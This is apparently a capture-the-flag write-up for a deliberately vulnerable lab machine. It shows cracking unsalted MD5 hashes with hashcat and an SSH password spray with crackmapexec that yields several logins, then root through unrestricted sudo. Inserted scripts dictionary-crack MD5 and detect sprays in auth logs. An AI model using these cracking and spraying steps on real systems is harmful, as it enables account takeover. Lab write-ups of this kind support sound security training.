098f6bcd4621d373cade4e832627b4f6

Identify the hash type

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo hash-identifier 'e22f07b17f98e0d9d364584ced0e3c18'
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Crack the MD5 hashes with hashcat

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo hashcat -m 0 -a 0 hash.lst /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 7 8845HS w/ Radeon 780M Graphics, 2913/5891 MB (1024 MB allocatable), 6MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 12 digests; 12 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

ed2539fe892d2c52c42a440354e8e3d5:madrid
4cb9c8a8048fd02294477fcb1a41191a:changeme
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234
098f6bcd4621d373cade4e832627b4f6:test
b2a97bcecbd9336b98d59d9324dae5cf:chuck33
2146bf95e8929874fc63d54f50f1d2e3:turtles77
9c42a1346e333a770904b2a2b37fa7d3:somepassword
e22f07b17f98e0d9d364584ced0e3c18:my2cents
Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: hash.lst
Time.Started.....: Fri Sep 27 14:46:20 2024 (4 secs)
Time.Estimated...: Fri Sep 27 14:46:24 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4226.1 kH/s (0.12ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 8/12 (66.67%) Digests (total), 8/12 (66.67%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[212173657879616e67656c2121] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 29%

Started: Fri Sep 27 14:46:18 2024
Stopped: Fri Sep 27 14:46:25 2024

Clean up the password strings and save them to a file, password.lst

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat hashcat.result 
ed2539fe892d2c52c42a440354e8e3d5:madrid                   
4cb9c8a8048fd02294477fcb1a41191a:changeme                 
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234                 
098f6bcd4621d373cade4e832627b4f6:test                     
b2a97bcecbd9336b98d59d9324dae5cf:chuck33                  
2146bf95e8929874fc63d54f50f1d2e3:turtles77                
9c42a1346e333a770904b2a2b37fa7d3:somepassword             
e22f07b17f98e0d9d364584ced0e3c18:my2cents
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat hashcat.result| awk -F ':' '{print$2}'
madrid                   
changeme                 
qwer1234                 
test                     
chuck33                  
turtles77                
somepassword             
my2cents
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat hashcat.result| awk -F ':' '{print$2}' > password.lst
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat password.lst  
madrid                   
changeme                 
qwer1234                 
test                     
chuck33                  
turtles77                
somepassword             
my2cents 
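The awk extraction and the hashcat run above are two halves of one job: turn the dumped `users` rows into login names and hashes, then see which unsalted MD5 values fall to a wordlist. The script below is an added example, not code from the writeup, that does both in one place. It parses the same `| user | hash |` row layout that `mysql` printed, keeps the local part of each e-mail as the SSH login, and checks every hash against a small constructed wordlist (standing in for rockyou.txt). The four rows and the wordlist are constructed sample input; the hash values are the ones shown in the table above.

```python
# Added example (not from the original writeup): the awk + hashcat steps in one script.
import hashlib
import re

# Constructed sample: the row layout `mysql` prints and that creds.lst contains.
CREDS_LST = """\
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |
"""

# Constructed wordlist standing in for /usr/share/wordlists/rockyou.txt.
WORDLIST = ["password", "123456", "changeme", "test", "letmein"]

# One table row: "| email | 32 hex chars |"; borders and the header row do not match.
ROW_RE = re.compile(r"^\|\s*(\S+@\S+)\s*\|\s*([0-9a-f]{32})\s*\|$")


def parse_creds(text):
    """Return [(login, md5hex)] from MySQL-style rows; login is the e-mail local part
    (what the writeup's second awk pass produced for users.lst)."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # skip table borders, headers, blank lines
        email, digest = m.groups()
        rows.append((email.split("@", 1)[0], digest))
    return rows


def crack_md5(digests, wordlist):
    """Dictionary attack on unsalted MD5 (hashcat -m 0 -a 0): because there is no
    salt, one hash per candidate is compared against every digest at once."""
    wanted = set(digests)
    found = {}
    for word in wordlist:
        word = word.strip()  # hashcat pads its result lines; stray spaces would spoil a later reuse
        h = hashlib.md5(word.encode()).hexdigest()
        if h in wanted:
            found[h] = word
            if len(found) == len(wanted):
                break
    return found


def recovered_logins(text, wordlist):
    """Map login -> cleartext for every account whose hash is in the wordlist."""
    rows = parse_creds(text)
    found = crack_md5([d for _, d in rows], wordlist)
    return {login: found[d] for login, d in rows if d in found}


if __name__ == "__main__":
    for login, pw in recovered_logins(CREDS_LST, WORDLIST).items():
        print(f"{login}:{pw}")
```

Two things the writeup's pipeline glosses over show up here. First, `awk -F ':' '{print$2}'` on hashcat's padded output leaves trailing spaces in password.lst, so the `strip()` is not optional when the results are reused. Second, the reason a 4-second CPU run recovered 8 of 12 hashes is the storage format, not the wordlist: unsalted MD5 means identical passwords give identical hashes and every candidate is tested against all users at once. The fix on the application side is a salted, slow hash (bcrypt, scrypt or Argon2), which would make the same wordlist run cost one hash computation per user per candidate.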

Try the usernames and passwords

Trying them one by one is slow; a tool is more efficient.

crackmapexec is mostly used in domain penetration tests; here it is only used in a simple way.

The crackmapexec output looks like this; use grep to show only the lines containing a plus sign, which makes the successful logins easy to spot.

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo crackmapexec ssh 192.168.50.156 -p password.lst -u users.lst --continue-on-success          
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing FTP protocol database
[*] Initializing SSH protocol database
[*] Initializing LDAP protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SSH         192.168.50.156  22     192.168.50.156   [*] SSH-2.0-OpenSSH_5.3
SSH         192.168.50.156  22     192.168.50.156   [-] brian:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:turtles77 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [+] brian:my2cents 
SSH         192.168.50.156  22     192.168.50.156   [-] john:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:turtles77 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:my2cents Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [+] alice:turtles77 
SSH         192.168.50.156  22     192.168.50.156   [-] alice:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:my2cents Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:turtles77 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:my2cents Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [+] leon:qwer1234 
SSH         192.168.50.156  22     192.168.50.156   [-] leon:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:turtles77 Authentication failed.

Use grep to make the output easier to read

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo crackmapexec ssh 192.168.50.156 -p password.lst -u users.lst --continue-on-success | grep '+' 
SSH         192.168.50.156  22     192.168.50.156   [+] brian:my2cents 
SSH         192.168.50.156  22     192.168.50.156   [+] alice:turtles77 
SSH         192.168.50.156  22     192.168.50.156   [+] leon:qwer1234 
SSH         192.168.50.156  22     192.168.50.156   [+] julia:madrid 
SSH         192.168.50.156  22     192.168.50.156   [+] michael:somepassword 
SSH         192.168.50.156  22     192.168.50.156   [+] charles:chuck33
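Seen from the target, the run above is a textbook password spray: one source, many accounts, a handful of passwords each, all inside a few seconds. The script below is an added example, not part of the writeup, showing what that looks like in the sshd auth log and how to flag it. It parses constructed OpenSSH `Failed password` / `Accepted password` lines and alerts on any source whose failures span at least `min_users` distinct accounts within `window_seconds`; the thresholds, the log lines and the source IP 192.168.50.200 are assumptions made for the example.

```python
# Added example (not part of the original writeup): defender's view of an SSH password spray.
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log in OpenSSH format; hosts, PIDs and the source IPs are made up.
AUTH_LOG = """\
Sep 27 14:50:01 bogon sshd[2101]: Failed password for brian from 192.168.50.200 port 50110 ssh2
Sep 27 14:50:01 bogon sshd[2101]: Failed password for brian from 192.168.50.200 port 50110 ssh2
Sep 27 14:50:02 bogon sshd[2103]: Accepted password for brian from 192.168.50.200 port 50112 ssh2
Sep 27 14:50:02 bogon sshd[2105]: Failed password for john from 192.168.50.200 port 50114 ssh2
Sep 27 14:50:03 bogon sshd[2107]: Failed password for alice from 192.168.50.200 port 50116 ssh2
Sep 27 14:50:03 bogon sshd[2109]: Failed password for invalid user ruby from 192.168.50.200 port 50118 ssh2
Sep 27 14:50:04 bogon sshd[2111]: Failed password for leon from 192.168.50.200 port 50120 ssh2
Sep 27 14:50:04 bogon sshd[2113]: Accepted password for leon from 192.168.50.200 port 50122 ssh2
Sep 27 14:55:00 bogon sshd[2200]: Failed password for admin from 192.168.50.77 port 40001 ssh2
Sep 27 14:55:30 bogon sshd[2201]: Accepted publickey for admin from 192.168.50.77 port 40002 ssh2
"""

# syslog timestamp, host, sshd[pid], outcome, optional "invalid user", account, source IP.
LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (Failed|Accepted) "
    r"(?:password|publickey) for (?:invalid user )?(\S+) from (\S+) port \d+"
)


def parse_auth_log(text, year=2024):
    """Return [(timestamp, outcome, user, src_ip)] for every sshd auth line.
    syslog lines carry no year, so one is assumed (constructed sample is from 2024)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            events.append((ts, m.group(2), m.group(3), m.group(4)))
    return events


def detect_spray(events, min_users=3, window_seconds=300):
    """Flag sources whose failed logins cover >= min_users distinct accounts inside a
    sliding window. Returns {src_ip: {"users": [...], "accepted": [...]}} where
    "accepted" lists sprayed accounts that the same source then logged into."""
    by_ip = defaultdict(list)
    for ts, outcome, user, ip in events:
        by_ip[ip].append((ts, outcome, user))

    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [(ts, u) for ts, o, u in evs if o == "Failed"]
        hit_users = set()
        start = 0
        for end in range(len(fails)):
            # advance the window start until it is within window_seconds of the newest failure
            while (fails[end][0] - fails[start][0]).total_seconds() > window_seconds:
                start += 1
            users = {u for _, u in fails[start:end + 1]}
            if len(users) >= min_users:
                hit_users |= users
        if hit_users:
            accepted = sorted({u for _, o, u in evs if o == "Accepted" and u in hit_users})
            alerts[ip] = {"users": sorted(hit_users), "accepted": accepted}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_spray(parse_auth_log(AUTH_LOG)).items():
        print(f"spray from {ip}: tried {info['users']}, succeeded as {info['accepted']}")
```

The distinct-user count is what separates a spray from a single user mistyping a password: the second source in the sample fails once for `admin` and is ignored, while the first fails across five accounts in three seconds and is reported together with the two accounts it got into. Per-account lockout does not stop this pattern (each account sees only a few attempts), which is why the detection keys on the source rather than the user; rate limiting by source and key-only authentication are the usual mitigations.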

User brian's sudo rights are (ALL) ALL, which is a very high level of privilege.

mysql> exit
exit
Bye
bash-4.1$ su brian
su brian
Password: my2cents
[brian@bogon inc]$ whoami
whoami
brian
[brian@bogon inc]$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for brian: my2cents
Matching Defaults entries for brian on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brian may run the following commands on this host:
    (ALL) ALL

Get root

[brian@bogon inc]$ sudo /bin/bash
sudo /bin/bash
[root@bogon inc]# whoami
whoami
root
[root@bogon inc]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:9d:12:a9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.156/24 brd 192.168.50.255 scope global eth0
    inet6 fe80::20c:29ff:fe9d:12a9/64 scope link 
       valid_lft forever preferred_lft forever
[root@bogon inc]# 

Summary

Host scan: the ports of interest are 80 and 8080.
Brute-force the directories on port 80; port 80 hosts a CMS, and the brute-force is done with dirb.
Port 8080 is the CMS back-end login page; log in with a universal-password SQL injection (authentication bypass).
Upload a reverse shell through the back end; the uploaded file is found under the assets directory discovered during the brute-force.
After catching the shell on kali, upgrade it with python.
Keep gathering information on the host and find the database connection config file.
Enter the database with mysql; the account is root with an empty password.
Find the users table in the website database and obtain the account names and password hashes.
Use crackmapexec for password spraying; switch to user brian and run sudo -l to check the account's privileges.
Use sudo /bin/bash to start a bash process as root and obtain root privileges.
Done.


http://www.ppmy.cn/news/1534657.html
